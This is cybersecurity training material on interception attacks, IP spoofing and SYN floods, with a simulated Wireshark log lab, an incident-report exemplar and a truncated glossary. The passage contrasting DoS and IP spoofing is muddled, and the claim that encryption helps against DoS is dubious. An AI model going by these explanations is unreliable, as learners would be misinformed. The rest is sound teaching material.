They may change the information in the body of the packet, like altering a recipient's bank account
number. Packet sniffing can be passive or active. Passive packet sniffing is a type of attack where
data packets are read in transit. Since all the traffic on a network is visible to any host on the hub,
malicious actors can view all the information going in and out of the device they are targeting.
Thinking back to the example of a letter being delivered, we can compare a passive packet sniffing
attack to a postal delivery person maliciously reading somebody's mail. The postal worker, or
packet sniffer, has the right to deliver the mail, but not the right to read the information inside.
Active packet sniffing is a type of attack where data packets are manipulated in transit. This may
include injecting internet protocols to redirect the packets to an unintended port or changing the
information the packet contains. An active packet sniffing attack would be like a neighbor telling the
delivery person "I'll deliver that mail for you," and then reading the mail or changing the letter
before putting it in your mailbox. Even though your neighbor knows you and even if they deliver it
to the correct house, they are actively going out of their way to engage in malicious behavior. The
good news is that malicious packet sniffing can be prevented. Let's look at a few ways the network
security professional can prevent these attacks. One way to protect against malicious packet sniffing
is to use a VPN to encrypt and protect data as it travels across the network. If you don't remember
how VPNs work, you can revisit the video about this topic in the previous section of the program.
When you use a VPN, hackers might intercept your traffic, but they won't be able to decode it
to read your private information. Another way to add a layer of protection against packet
sniffing is to make sure that the websites you visit use HTTPS at the beginning of the domain address.
Previously, we discussed how HTTPS uses SSL/TLS to encrypt data and prevent eavesdropping
when malicious actors spy on network transmissions. One final way to help protect yourself against
malicious packet sniffing is to avoid using unprotected WiFi. You usually find unprotected WiFi in
public places like coffee shops, restaurants, or airports. These networks don't use encryption. This
means that anyone on the network can access all of the data traveling to and from your device. One
precaution you can take is avoiding free public WiFi unless you have a VPN service already installed
on your device. Now you know how threat actors may use packet sniffing and how to protect a
network from these attacks.
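The HTTPS precaution mentioned above can be checked programmatically. This minimal sketch only inspects the URL scheme, which is a necessary (though not sufficient) condition for encrypted web traffic:

```python
from urllib.parse import urlparse

def uses_https(url: str) -> bool:
    """Return True if the URL's scheme is HTTPS (encrypted web traffic)."""
    return urlparse(url).scheme.lower() == "https"

print(uses_https("https://example.com/login"))  # True
print(uses_https("http://example.com/login"))   # False
```

A browser performs the same check before deciding whether to warn you that a connection is not secure.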
IP Spoofing
IP spoofing is a network attack performed when an attacker changes the source IP of a data packet to
impersonate an authorized system and gain access to a network. In this kind of attack, the hacker is
pretending to be someone they are not so they can communicate over the network with the target
computer and get past firewall rules that may prevent outside traffic. Some common IP spoofing
attacks are on-path attacks, replay attacks, and smurf attacks. Let's discuss these one at a time. An
on-path attack is an attack where the malicious actor places themselves in the middle of an
authorized connection and intercepts or alters the data in transit. On-path attackers gain access to
the network and put themselves between two devices, like a web browser and a web server. Then
they sniff the packet information to learn the IP and MAC addresses of devices that are
communicating with each other. After they have this information, they can pretend to be either of
these devices. Another type of attack is a replay attack. A replay attack is a network attack performed
when a malicious actor intercepts a data packet in transit and delays it or repeats it at another time. A
delayed packet can cause connection issues between target computers, or a malicious actor may
take a network transmission that was sent by an authorized user and repeat it later to impersonate
the authorized user. A smurf attack is a combination of a DDoS attack and an IP spoofing attack. The
attacker sniffs an authorized user's IP address and floods it with packets. This overwhelms the
target computer and can bring down a server or the entire network. Now that you've learned about
different kinds of IP spoofing, let's talk about how you can protect the network from this kind of
attack. As you previously learned, encryption should always be implemented so that the data in
your network transfers can't be read by malicious actors. Firewalls can be configured to protect
against IP spoofing. IP spoofing makes it seem like the malicious actor is an authorized user by
changing the sender's address of the data packet to match the target network's address. So if a
firewall receives a data packet from the internet where the sender's IP address is the same as the
private network, then the firewall will deny the transmission since all the devices with that IP
address should already be on the local network. You can make sure that your firewalls are configured
correctly by creating a rule to reject all incoming traffic that has the same IP address as the local
network. That's it for IP spoofing. You've learned how IP spoofing is used in some common attacks
like on-path attacks, replay attacks, and smurf attacks.
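The firewall rule described above (reject external packets that claim a local source address) can be sketched with Python's standard ipaddress module. The 192.168.1.0/24 network below is a hypothetical example, not an address from the course material:

```python
import ipaddress

# Hypothetical local network protected by the firewall.
LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")

def allow_inbound(source_ip: str) -> bool:
    """Deny any packet arriving from the internet whose claimed source IP
    belongs to the local network, since genuine local traffic never
    enters from outside (a basic anti-spoofing rule)."""
    return ipaddress.ip_address(source_ip) not in LOCAL_NET

print(allow_inbound("203.0.113.7"))   # True  -- legitimate external source
print(allow_inbound("192.168.1.42"))  # False -- spoofed local address
```

Real firewalls express this as an ingress filter rule, but the logic is the same membership test.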
Overview of interception tactics
In the previous course items, you learned how packet sniffing and IP spoofing are used in network
attacks. Because these attacks intercept data packets as they travel across the network, they are called
interception attacks.
This reading will introduce you to some specific attacks that use packet sniffing and IP spoofing. You will
learn how hackers use these tactics and how security analysts can counter the threat of interception
attacks.
A closer review of packet sniffing
As you learned in a previous video, packet sniffing is the practice of capturing and inspecting data
packets across a network. On a private network, data packets are directed to the matching destination
device on the network.
The device’s Network Interface Card (NIC) is a piece of hardware that connects the device to a network.
The NIC reads the data transmission, and if it contains the device’s MAC address, it accepts the packet and
sends it to the device to process the information based on the protocol. This occurs in all standard
network operations. However, a NIC can be set to promiscuous mode, which means that it accepts all
traffic on the network, even the packets that aren’t addressed to the NIC’s device. You’ll learn more
about NICs later in the program.
Malicious actors might use software like Wireshark to capture the data
on a private network and store it for later use. They can then use the personal information to their own
advantage. Alternatively, they might use the IP and MAC addresses of authorized users of the private
network to perform IP spoofing.
A closer review of IP spoofing
After a malicious actor has sniffed packets on the network, they can impersonate the IP and MAC
addresses of authorized devices to perform an IP spoofing attack. Firewalls can help prevent IP spoofing
attacks when configured to refuse unauthorized IP packets and suspicious traffic. Next, you’ll examine a
few common IP spoofing attacks that are important to be familiar with as a security analyst.
On-path attack
An on-path attack happens when a hacker intercepts the communication between two devices or servers
that have a trusted relationship. The transmission between these two trusted network devices could
contain valuable information like usernames and passwords that the malicious actor can collect. An
on-path attack is sometimes referred to as a meddler-in-the-middle attack because the hacker is hiding in
the middle of communications between two trusted parties.
Or, it could be that the intercepted transmission contains a DNS system look-up. You’ll recall from an
earlier video that a DNS server translates website domain names into IP addresses. If a malicious actor
intercepts a transmission containing a DNS lookup, they could spoof the DNS response from the server
and redirect a domain name to a different IP address, perhaps one that contains malicious code or other
threats. The most important way to protect against an on-path attack is to encrypt your data in transit, e.g.
using TLS.
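As a concrete illustration of encrypting data in transit, Python's default TLS configuration already enforces the two checks that defeat a basic on-path attacker, certificate validation and hostname verification. This sketch only inspects the context's settings and makes no network connection:

```python
import ssl

# The default SSL context requires a valid certificate chain and verifies
# that the certificate matches the hostname, so an on-path attacker cannot
# simply present a forged identity.
context = ssl.create_default_context()

print(context.verify_mode == ssl.CERT_REQUIRED)  # True
print(context.check_hostname)                    # True
```

Libraries that disable these checks (for example, to silence certificate errors) reopen the door to on-path interception.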
Smurf attack
A smurf attack is a network attack that is performed when an attacker sniffs an authorized user’s IP
address and floods it with packets. Once the spoofed packet reaches the broadcast address, it is sent to
all of the devices and servers on the network.
In a smurf attack, IP spoofing is combined with another denial of service (DoS) technique to flood the
network with unwanted traffic. For example, the spoofed packet could include an Internet Control
Message Protocol (ICMP) ping. As you learned earlier, ICMP is used to troubleshoot a network. But if too
many ICMP messages are transmitted, the ICMP echo responses overwhelm the servers on the network
and they shut down. This creates a denial of service and can bring an organization’s operations to a halt.
An important way to protect against a smurf attack is to use an advanced firewall that can monitor any
unusual traffic on the network. Most next generation firewalls (NGFW) include features that detect
network anomalies to ensure that oversized broadcasts are detected before they have a chance to bring
down the network.
DoS attack
As you’ve learned, once the malicious actor has sniffed the network traffic, they can impersonate an
authorized user. A denial of service (DoS) attack is a class of attacks in which the attacker prevents the
compromised system from performing legitimate activity or responding to legitimate traffic. Unlike IP
spoofing, however, the attacker will not receive a response from the targeted host; everything about the
data packet, including the IP address in its header, is authorized. In IP spoofing attacks, by contrast, the
malicious actor sends IP packets containing fake IP addresses and keeps sending them until the network
server crashes.
Pro Tip: Remember the principle of defense-in-depth. There isn’t one perfect strategy for stopping each
kind of attack. You can layer your defense by using multiple strategies. In this case, using industry
standard encryption will strengthen your security and help you defend from DoS attacks on more than
one level.
Key takeaways
This reading covered several types of common IP spoofing attacks. You learned about how packet
sniffing is performed and how gathering information from intercepting data transmissions can give
malicious actors opportunities for IP spoofing. Whether it is an on-path attack, IP spoofing attack, or a
smurf attack, analysts need to ensure that mitigation strategies are in place to limit the threat and
prevent security breaches.
Activity Overview
In this activity, you will consider a scenario involving a customer of the company that you work for who
experiences a security issue when accessing the company’s website. You will identify the likely cause of
the service interruption. Then, you will explain how the attack occurred and the negative impact it had
on the website.
In this course, you have learned about several common network attacks. You have learned their names,
how they are carried out, and the characteristics of each attack from the perspective of the target.
Understanding how attacks impact a network will help you troubleshoot issues on your organization’s
network. It will also help you take steps to mitigate damage and protect a network from future attacks.
To review attacks, visit Identify: Network Attacks
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You work as a security analyst for a travel agency that advertises sales and promotions on the
company’s website. The employees of the company regularly access the company’s sales webpage to
search for vacation packages their customers might like.
One afternoon, you receive an automated alert from your monitoring system indicating a problem with
the web server. You attempt to visit the company’s website, but you receive a connection timeout error
message in your browser.
You use a packet sniffer to capture data packets in transit to and from the web server. You notice a large
number of TCP SYN requests coming from an unfamiliar IP address. The web server appears to be
overwhelmed by the volume of incoming traffic and is losing its ability to respond to the abnormally
large number of SYN requests. You suspect the server is under attack by a malicious actor.
You take the server offline temporarily so that the machine can recover and return to a normal
operating status. You also configure the company’s firewall to block the IP address that was sending the
abnormal number of SYN requests. You know that your IP blocking solution won’t last long, as an
attacker can spoof other IP addresses to get around this block. You need to alert your manager about
this problem quickly and discuss the next steps to stop this attacker and prevent this problem from
happening again. You will need to be prepared to tell your boss about the type of attack you discovered
and how it was affecting the web server and employees.
Step-By-Step Instructions
Step 1: Access the template
To use the template for this course item, click the link below and select Use Template.
Link to template: Cybersecurity incident report
Step 2: Access supporting materials
The following supporting materials will help you complete this activity. Keep them open as you proceed
to the next steps.
To use the supporting materials for this course item, click the following links and select Use Template.
Links to supporting materials:
● How to read a Wireshark TCP/HTTP log
How to read a Wireshark TCP/HTTP log
In this reading, you’ll learn how to read a Wireshark TCP/HTTP log for network traffic between
employee website visitors and the company’s web server. Most network protocol/traffic analyzer
tools used to capture packets will provide this same information.
Log entry number and time

No.  Time
47   3.144521
48   3.195755
49   3.246989

This Wireshark TCP log section provided to you starts at log entry number (No.) 47, which is
3.144521 seconds after the logging tool started recording. This indicates that approximately 47
messages were sent and received by the web server in the first 3.1 seconds of the log. This rapid
traffic speed is why the tool tracks time down to fractions of a millisecond.
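As a quick check on the timing, the three timestamps shown for entries 47-49 are spaced roughly 51 milliseconds apart:

```python
# Timestamps (seconds since the capture started) for log entries 47-49.
times = [3.144521, 3.195755, 3.246989]

# Gap between each consecutive pair of entries, in milliseconds.
gaps_ms = [round((b - a) * 1000, 3) for a, b in zip(times, times[1:])]
print(gaps_ms)  # [51.234, 51.234]
```

Sub-second gaps like these are why packet analyzers need millisecond-level (or finer) timestamps.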
Source and destination IP addresses

Source         Destination
198.51.100.23  192.0.2.1
192.0.2.1      198.51.100.23
198.51.100.23  192.0.2.1

The Source and Destination columns contain the source IP address of the machine that is sending a
packet and the intended destination IP address of the packet. In this log file, the IP address
192.0.2.1 belongs to the company’s web server. The IP addresses in the 198.51.100.0/24 range
belong to the employees’ computers.
Protocol type and related information

Protocol  Info
TCP       42584->443 [SYN] Seq=0 Win=5792 Len=120...
TCP       443->42584 [SYN, ACK] Seq=0 Win=5792 Len=120...
TCP       42584->443 [ACK] Seq=1 Win=5792 Len=120...

The Protocol column indicates that the packets are being sent using the TCP protocol, which operates at
the transport layer of the TCP/IP model. In the given log file, you will notice that the protocol
eventually changes to HTTP, at the application layer, once the connection to the web server is
successfully established.
The Info column provides information about the packet. It lists the source port followed by an
arrow (->) pointing to the destination port. In this case, port 443 belongs to the web server. Port 443
is normally used for encrypted web traffic.
The next data element given in the Info column is part of the three-way handshake process to
establish a connection between two machines. In this case, employees are trying to connect to the
company’s web server:
● The [SYN] packet is the initial request from an employee visitor trying to connect to a web
page hosted on the web server. SYN stands for “synchronize.”
● The [SYN, ACK] packet is the web server’s response to the visitor’s request agreeing to the
connection. The server will reserve system resources for the final step of the handshake.
SYN, ACK stands for “synchronize acknowledge.”
● The [ACK] packet is the visitor’s machine acknowledging the permission to connect. This is
the final step required to make a successful TCP connection. ACK stands for “acknowledge.”
The next few items in the Info column provide more details about the packets. However, this data is
not needed to complete this activity. If you would like to learn more about packet properties, please
visit Microsoft’s Introduction to Network Trace Analysis.
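The three-way handshake described above can be modeled as a tiny state machine, here from the server's point of view. The state names are illustrative simplifications, not exact TCP protocol states:

```python
def handshake_state(packets: list) -> str:
    """Walk the handshake one packet at a time; return the final state.
    The connection is ESTABLISHED only after SYN, SYN-ACK, and ACK
    occur in order."""
    state = "CLOSED"
    transitions = {
        ("CLOSED", "SYN"): "SYN_RECEIVED",
        ("SYN_RECEIVED", "SYN-ACK"): "SYN_ACK_SENT",
        ("SYN_ACK_SENT", "ACK"): "ESTABLISHED",
    }
    for p in packets:
        state = transitions.get((state, p), state)
    return state

print(handshake_state(["SYN", "SYN-ACK", "ACK"]))  # ESTABLISHED
print(handshake_state(["SYN"]))                    # SYN_RECEIVED
```

Note that a connection stuck in SYN_RECEIVED ties up reserved server resources, which is exactly what a SYN flood attack exploits.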
Normal website traffic

A normal transaction between a website visitor and the web server looks like:

No.  Time      Source         Destination    Protocol  Info
47   3.144521  198.51.100.23  192.0.2.1      TCP       42584->443 [SYN] Seq=0 Win=5792 Len=120...
48   3.195755  192.0.2.1      198.51.100.23  TCP       443->42584 [SYN, ACK] Seq=0 Win=5792 Len=120...
49   3.246989  198.51.100.23  192.0.2.1      TCP       42584->443 [ACK] Seq=1 Win=5792 Len=120...
50   3.298223  198.51.100.23  192.0.2.1      HTTP      GET /sales.html HTTP/1.1
51   3.349457  192.0.2.1      198.51.100.23  HTTP      HTTP/1.1 200 OK (text/html)

Notice that the handshake process takes only a few milliseconds to complete. Then the employee’s
browser requests the sales.html webpage using the HTTP protocol at the application layer of the
TCP/IP model, and the web server responds to the request.
The Attack
As you learned previously, malicious actors can take advantage of the TCP protocol by flooding a
server with SYN packet requests for the first part of the handshake. However, if the number of SYN
requests is greater than the server resources available to handle the requests, then the server will
become overwhelmed and unable to respond to the requests. This is a network level denial of
service (DoS) attack, called a SYN flood attack, that targets network bandwidth to slow traffic. A
SYN flood attack simulates a TCP connection and floods the server with SYN packets. A direct DoS
attack originates from a single source. A distributed denial of service (DDoS) attack comes from
multiple sources, often in different locations, making it more difficult to identify the attacker or
attackers.
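One simple way an analyst might surface a SYN flood in a capture like this is to count [SYN] packets per source IP and flag any source that exceeds a threshold. The rows below are simplified, illustrative (source, info) pairs modeled on the log, not the full capture:

```python
from collections import Counter

# Simplified (source_ip, info) rows modeled on the log excerpt.
rows = [
    ("203.0.113.0", "[SYN]"), ("198.51.100.14", "[SYN]"),
    ("203.0.113.0", "[SYN]"), ("203.0.113.0", "[SYN]"),
    ("203.0.113.0", "[SYN]"), ("198.51.100.5", "[SYN]"),
]

def flag_syn_flood(rows, threshold=3):
    """Return source IPs whose SYN count meets or exceeds the threshold."""
    syn_counts = Counter(src for src, info in rows if "[SYN]" in info)
    return [src for src, n in syn_counts.items() if n >= threshold]

print(flag_syn_flood(rows))  # ['203.0.113.0']
```

In the actual log, the attacker's address 203.0.113.0 stands out the same way: it keeps sending SYN requests without completing handshakes, while legitimate visitors send one SYN each.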
There are two tabs at the bottom of the log file. One is labeled “Color coded TCP log.” If you click on
that tab, you will find the server interactions with the attacker’s IP address (203.0.113.0) marked
with red highlighting (and the word “red” in column A).
Color as text  No.  Time      Source         Destination    Protocol  Info
red            52   3.390692  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
red            53   3.441926  192.0.2.1      203.0.113.0    TCP       443->54770 [SYN, ACK] Seq=0 Win=5792 Len=120...
red            54   3.493160  203.0.113.0    192.0.2.1      TCP       54770->443 [ACK] Seq=1 Win=5792 Len=0...
green          55   3.544394  198.51.100.14  192.0.2.1      TCP       14785->443 [SYN] Seq=0 Win=5792 Len=120...
green          56   3.599628  192.0.2.1      198.51.100.14  TCP       443->14785 [SYN, ACK] Seq=0 Win=5792 Len=120...
red            57   3.664863  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          58   3.730097  198.51.100.14  192.0.2.1      TCP       14785->443 [ACK] Seq=1 Win=5792 Len=120...
red            59   3.795332  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=120...
green          60   3.860567  198.51.100.14  192.0.2.1      HTTP      GET /sales.html HTTP/1.1
red            61   3.939499  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=120...
green          62   4.018431  192.0.2.1      198.51.100.14  HTTP      HTTP/1.1 200 OK (text/html)
Initially, the attacker’s SYN request is answered normally by the web server (log items 52-54).
However, the attacker keeps sending more SYN requests, which is abnormal. At this point, the web
server is still able to respond to normal visitor traffic, which is highlighted and labeled as green. An
employee visitor with the IP address of 198.51.100.14 successfully completes a SYN/ACK
connection handshake with the webserver (log item nos. 55, 56, 58). Then, the employee’s browser
requests the sales.html webpage with the GET command and the web server responds (log item no.
60 and 62).
Color as text  No.  Time      Source         Destination    Protocol  Info
green          63   4.097363  198.51.100.5   192.0.2.1      TCP       33638->443 [SYN] Seq=0 Win=5792 Len=120...
red            64   4.176295  192.0.2.1      203.0.113.0    TCP       443->54770 [SYN, ACK] Seq=0 Win=5792 Len=120...
green          65   4.255227  192.0.2.1      198.51.100.5   TCP       443->33638 [SYN, ACK] Seq=0 Win=5792 Len=120...
red            66   4.256159  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          67   5.235091  198.51.100.5   192.0.2.1      TCP       33638->443 [ACK] Seq=1 Win=5792 Len=120...
red            68   5.236023  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          69   5.236955  198.51.100.16  192.0.2.1      TCP       32641->443 [SYN] Seq=0 Win=5792 Len=120...
red            70   5.237887  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          71   6.228728  198.51.100.5   192.0.2.1      HTTP      GET /sales.html HTTP/1.1
red            72   6.229638  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
yellow         73   6.230548  192.0.2.1      198.51.100.16  TCP       443->32641 [RST, ACK] Seq=0 Win=5792 Len=120...
red            74   6.330539  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          75   6.330885  198.51.100.7   192.0.2.1      TCP       42584->443 [SYN] Seq=0 Win=5792 Len=0...
red            76   6.331231  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
yellow         77   7.330577  192.0.2.1      198.51.100.5   TCP       HTTP/1.1 504 Gateway Time-out (text/html)
red            78   7.331323  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
green          79   7.340768  198.51.100.22  192.0.2.1      TCP       6345->443 [SYN] Seq=0 Win=5792 Len=0...
yellow         80   7.340773  192.0.2.1      198.51.100.7   TCP       443->42584 [RST, ACK] Seq=1 Win=5792 Len=120...
red            81   7.340778  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
red            82   7.340783  203.0.113.0    192.0.2.1      TCP       54770->443 [SYN] Seq=0 Win=5792 Len=0...
red            83   7.439658  192.0.2.1      203.0.113.0    TCP       443->54770 [RST, ACK] Seq=1 Win=5792 Len=0...
In the next 20 rows, the log begins to reflect the struggle the web server is having to keep up with
the abnormal number of SYN requests coming in at a rapid pace. The attacker is sending several
SYN requests every second. The rows highlighted and labeled yellow are failed communications
between legitimate employee website visitors and the web server.
The two types of errors in the logs include:
● An HTTP/1.1 504 Gateway Time-out (text/html) error message. This message is generated by a gateway server that was waiting for a response from the web server. If the web server takes too long to respond, the gateway server will send a timeout error message to the requesting browser.
● An [RST, ACK] packet, which is sent to the requesting visitor if the [SYN, ACK] packet is not received by the web server. RST stands for reset and ACK stands for acknowledge. The visitor receives a timeout error message in their browser and the connection attempt is dropped. The visitor can refresh their browser to attempt to send a new SYN request.
Color as text | No.  | Time      | Source (x = redacted) | Destination (x = redacted) | Protocol | Info
red    | 119 | 19.198705 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 120 | 19.521718 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
yellow | 121 | 19.844731 | 192.0.2.1    | 198.51.100.9 | TCP | 443->4631 [RST, ACK] Seq=1 Win=5792 Len=0...
red    | 122 | 20.167744 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 123 | 20.490757 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 124 | 20.81377  | 192.0.2.1    | 203.0.113.0  | TCP | 443->54770 [RST, ACK] Seq=1 Win=5792 Len=0...
red    | 125 | 21.136783 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 126 | 21.459796 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 127 | 21.782809 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 128 | 22.105822 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 129 | 22.428835 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 130 | 22.751848 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 131 | 23.074861 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 132 | 23.397874 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 133 | 23.720887 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 134 | 24.0439   | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 135 | 24.366913 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 136 | 24.689926 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 137 | 25.012939 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 138 | 25.335952 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 139 | 25.658965 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 140 | 25.981978 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 141 | 26.304991 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 142 | 26.628004 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 143 | 26.951017 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 144 | 27.27403  | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 145 | 27.597043 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 146 | 27.920056 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 147 | 28.243069 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 148 | 28.566082 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 149 | 28.889095 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 150 | 29.212108 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 151 | 29.535121 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
red    | 152 | 29.858134 | 203.0.113.0  | 192.0.2.1    | TCP | 54770->443 [SYN] Seq=0 Win=5792 Len=0...
As you scroll through the rest of the log, you will notice the web server stops responding
to legitimate employee visitor traffic. The visitors receive more error messages indicating that they
cannot establish or maintain a connection to the web server. From log item number 125 on, the web
server stops responding. The only items logged at that point are from the attack. As there is only
one IP address attacking the web server, you can assume this is a direct DoS SYN flood attack.
Step 3: Identify the type of attack causing this network interruption
Reflect on the types of network intrusion attacks that you have learned about in this course
so far. As a security analyst, identifying the type of network attack based on the incident is
the first step to managing the attack and preventing similar attacks in the future.
Here are some questions to consider when determining what type of attack occurred:
● What do you currently understand about network attacks?
● Which type of attack would likely result in the symptoms described in the scenario?
● What is the difference between a denial of service (DoS) and a distributed denial of service (DDoS) attack?
● Why is the website taking a long time to load and reporting a connection timeout error?
Review the Wireshark reading from step 2 and try to identify patterns in the logged
network traffic. Analyze the patterns to determine which type of network attack occurred.
Write your analysis in section one of the Cybersecurity incident report template provided.
Step 4: Explain how the attack is causing the website to
malfunction
Review the Wireshark reading from step 2, then write your analysis in section two of the
Cybersecurity incident report template provided.
When writing your report, discuss the network devices and activities that are involved in
the interruption. Include the following information in your explanation:
● Describe the attack. What are the main symptoms or characteristics of this specific type of attack?
● Explain how it affected the organization’s network. How does this specific network attack affect the website and how it functions?
● Describe the potential consequences of this attack and how it negatively affects the organization.
● Optional: Suggest potential ways to secure the network so this attack can be prevented in the future.
What to Include in Your Response
Be sure to address the following in your completed activity:
● The name of the network intrusion attack
● A description of how the attack negatively impacts network performance
Activity Exemplar: Analyze network attacks
Section 1: Identify the type of attack that may have caused this
network interruption
One potential explanation for the website’s connection timeout error message is a DoS
attack. The logs show that the web server stops responding after it is overloaded with
SYN packet requests. This event could be a type of DoS attack called SYN flooding.
Section 2: Explain how the attack is causing the website malfunction
When the website visitors try to establish a connection with the web server, a three-way
handshake occurs using the TCP protocol. The handshake consists of three steps:
1. A SYN packet is sent from the source to the destination, requesting to connect.
2. The destination replies to the source with a SYN-ACK packet to accept the
connection request. The destination will reserve resources for the source to
connect.
3. A final ACK packet is sent from the source to the destination acknowledging the
permission to connect.
In the case of a SYN flood attack, a malicious actor will send a large number of SYN
packets all at once, which overwhelms the server’s available resources to reserve for the
connection. When this happens, there are no server resources left for legitimate TCP
connection requests.
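To make the resource-exhaustion mechanism concrete, here is a hedged toy model in Python (not part of the exemplar). The `ToyServer` class, its slot limit, and the connection IDs are invented for illustration; a real TCP stack manages a backlog of half-open connections in the kernel.

```python
# Sketch: toy model of SYN-flood resource exhaustion. The server reserves a
# slot per SYN (step 2 of the handshake) and frees it only when the final
# ACK arrives. Attacker SYNs never send the ACK, so the slots run out.
class ToyServer:
    def __init__(self, max_half_open=5):
        self.max_half_open = max_half_open
        self.half_open = set()
        self.established = set()

    def receive_syn(self, conn_id):
        if len(self.half_open) >= self.max_half_open:
            return "dropped"            # no resources left: visitor times out
        self.half_open.add(conn_id)     # server reserves resources, sends SYN-ACK
        return "syn-ack"

    def receive_ack(self, conn_id):
        if conn_id in self.half_open:   # final ACK completes the handshake
            self.half_open.remove(conn_id)
            self.established.add(conn_id)
            return "established"
        return "rst"

server = ToyServer(max_half_open=5)
for i in range(5):                      # attacker sends 5 SYNs, never ACKs
    server.receive_syn(f"attacker-{i}")
print(server.receive_syn("employee"))   # → dropped
```

Once the half-open table is full, every legitimate SYN is dropped, which is exactly the symptom the logs show.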
The logs indicate that the web server has become overwhelmed and is unable to process
the visitors’ SYN requests. The server is unable to open a new connection to new visitors
who receive a connection timeout message.
Glossary terms from module 3
Terms and definitions from Course 3, Module 3
Active packet sniffing: A type of attack where data packets are manipulated in transit
Botnet: A collection of computers infected by malware that are under the control of a single threat actor,
known as the “bot-herder”
Denial of service (DoS) attack: An attack that targets a network or server and floods it with network
traffic
Distributed denial of service (DDoS) attack: A type of denial of service attack that uses multiple devices
or servers located in different locations to flood the target network with unwanted traffic
Internet Control Message Protocol (ICMP): An internet protocol used by devices to tell each other about
data transmission errors across the network
Internet Control Message Protocol (ICMP) flood: A type of DoS attack performed by an attacker
repeatedly sending ICMP request packets to a network server
IP spoofing: A network attack performed when an attacker changes the source IP of a data packet to
impersonate an authorized system and gain access to a network
On-path attack: An attack where a malicious actor places themselves in the middle of an authorized
connection and intercepts or alters the data in transit
Packet sniffing: The practice of capturing and inspecting data packets across a network
Passive packet sniffing: A type of attack where a malicious actor connects to a network hub and looks at
all traffic on the network
Ping of death: A type of DoS attack caused when a hacker pings a system by sending it an oversized ICMP
packet that is bigger than 64KB
Replay attack: A network attack performed when a malicious actor intercepts a data packet in transit
and delays it or repeats it at another time
Smurf attack: A network attack performed when an attacker sniffs an authorized user’s IP address and
floods it with ICMP packets
Synchronize (SYN) flood attack: A type of DoS attack that simulates a TCP/IP connection and floods a
